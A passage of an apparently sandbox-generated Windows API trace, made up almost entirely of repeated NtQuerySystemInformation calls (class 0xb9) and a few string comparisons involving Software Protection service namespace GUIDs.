(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0227.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x28, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0227.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0227.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0227.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0227.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x20, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x20, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.262] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd328, Length=0x50, ResultLength=0x0) [0227.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0227.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x28, ResultLength=0x0) [0227.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0227.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x28, ResultLength=0x0) [0227.270] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0227.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0227.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0227.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0227.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd480, Length=0x28, ResultLength=0x0) [0227.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0227.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0227.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0227.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x28, ResultLength=0x0) [0227.278] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0227.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0227.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0227.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0227.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0227.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0227.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd480, Length=0x28, ResultLength=0x0) [0227.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0227.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0227.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0227.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0227.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0227.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0227.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.288] NtQuerySystemInformation 